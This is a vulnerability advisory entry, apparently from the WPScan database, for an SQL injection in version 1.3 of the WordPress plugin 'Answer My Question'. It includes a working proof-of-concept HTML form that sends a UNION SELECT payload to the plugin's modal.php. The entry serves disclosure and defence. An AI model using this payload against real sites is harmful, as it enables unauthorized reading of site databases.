Answer My Question 1.3 - SQL Injection
Sign up to our free email alerts service for instant vulnerability notifications!| Description | $_POST['id'] is not escaped. Url is accessible for any user. Url vulnerable : http://target/wp-content/plugins/answer-my-question/modal.php |
| Proof of Concept | <form method="post" action="http://target/wp-content/plugins/answer-my-question/modal.php">
<input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
<input type="submit" value="Send">
</form> |
Affects
| Plugin |
answer-my-question
|
References
| EXPLOITDB | 40771 |
| URL | http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/ |
Classification
| Type | SQLI |
| OWASP Top 10 | A1: Injection |
| CWE | CWE-89 |
Miscellaneous
| Submitter | Lenon Leite |
| Submitter Website | http://lenonleite.com.br/en/ |
| Submitter Twitter | lenonleite |
| Views | 181 |
| Verified | No |
| WPVDB ID | 8669 |
Timeline
| Publicly Published | 2016-11-17 (7 months ago) |
| Added | 2016-11-21 (7 months ago) |
| Last Updated | 2016-11-21 (7 months ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
